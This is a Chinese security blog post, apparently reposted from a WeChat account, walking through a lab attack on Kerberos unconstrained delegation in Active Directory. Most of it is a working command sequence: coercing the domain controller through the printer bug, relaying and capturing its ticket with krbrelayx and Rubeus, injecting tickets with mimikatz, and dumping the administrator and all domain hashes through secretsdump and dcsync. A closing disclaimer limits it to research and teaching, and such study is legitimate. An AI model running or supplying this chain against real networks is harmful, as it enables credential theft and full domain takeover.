内网渗透—非约束委派

admin 2025年6月14日23:10:28评论28 views字数 1639阅读5分27秒阅读模式

内网渗透—非约束委派

环境搭建

1、搭建域控制器

2、创建域用户:xxxxxxx

3、授予普通域用户修改和读取SPN权限

https://www.freebuf.com/sectool/252329.html

4、使用xxxxxxx用户注册SPN。

setspn -U -A mysql/linux.htb.com htb.comxxxxxxx
内网渗透—非约束委派

SPN即为服务对象的唯一标识,其中服务用户为xxxxxxx,服务所在的主机为linux.htb.com

6、域控开启打印机服务。

漏洞利用

利用方式1

1、检测域控是否启动打印机。

rpcdump.py @192.168.135.183 | grep MS-RPRN
内网渗透—非约束委派

2、添加SPN记录

因为我们是在linux机器上,所以需要使用域用户在当前的linux机器上注册SPN服务。

python3 addspn.py -u "htb.comxxxxxxx" -p "xxxxxxx" -s host/linux.htb.com 192.168.135.183

3、在linux机器上添加对应的dns解析记录。

python3.6 dnstool.py -u "htb.comadministrator" -p xxxxxxx -r linux.htb.com  -a add -d 192.168.135.129192.168.135.183
内网渗透—非约束委派

4、触发打印机错误

python3 printerbug.py htb.com/xxxxxxx@192.168.135.183  linux.htb.com
内网渗透—非约束委派

5、开启中继,捕获票据。

python3 krbrelayx.py -p "xxxxxxx" -s xxxxxxx
内网渗透—非约束委派

6、导入票据

export [email protected][email protected]

7、获取dc主机上的用户hash

python3 /root/桌面/impacket/examples/secretsdump.py -k dc.htb.com -just-dc-user administrator
内网渗透—非约束委派

利用方式2

SpoolSample.exe dc fileserver
Rubeus.exe monitor /interval:1 /filteruser:dc$
内网渗透—非约束委派

抓取票据

mimikatz "privilege::debug""sekurlsa::tickets /export""exit"

此时可能抓取不到票据,所以使用Rubeus.exe将票据注入内存。

Rubeus.exe ptt /ticket:
内网渗透—非约束委派

此时使用mimikazi将票据从内存中提取出来

mimikatz "privilege::debug""sekurlsa::tickets /export""exit"
内网渗透—非约束委派

将票据注入当前会话

mimikatz "kerberos::ptt [0;5736b][email protected]"
内网渗透—非约束委派

导出域控hash

mimikatz "lsadump::dcsync /domain:htb.com /all /csv""exit"
内网渗透—非约束委派

漏洞总结

1、非约束委派攻击,需要主机配置了非约束委派而不是服务账户配置了约束委派。

主机账户配置非约束委派才能导出登陆该主机上用户的TGT。

2、一般来说使用SpoolSample迫使域控回连目标主机回发生错误,一般使用linux的printbug来触发回连。

3、在触发打印机回连接当前主机的时候,如果使用Rubeus.exe来获取票据,在当前主机使用mimikazi是获取不到文本形式的TGT票据。如果要获取文本形式的票据,只需要向域控发起打印机请求使其回连当前主机,然后使用mimikzi抓取即可,无需使用Rubeus.exe来监控获取tgt票据,也就是说两者即可使用其中一个。

https://blog.csdn.net/qq_43645782/article/details/118762916

原文始发于微信公众号(土拨鼠的安全屋):内网渗透—非约束委派

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月14日23:10:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透—非约束委派https://cn-sec.com/archives/4165256.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息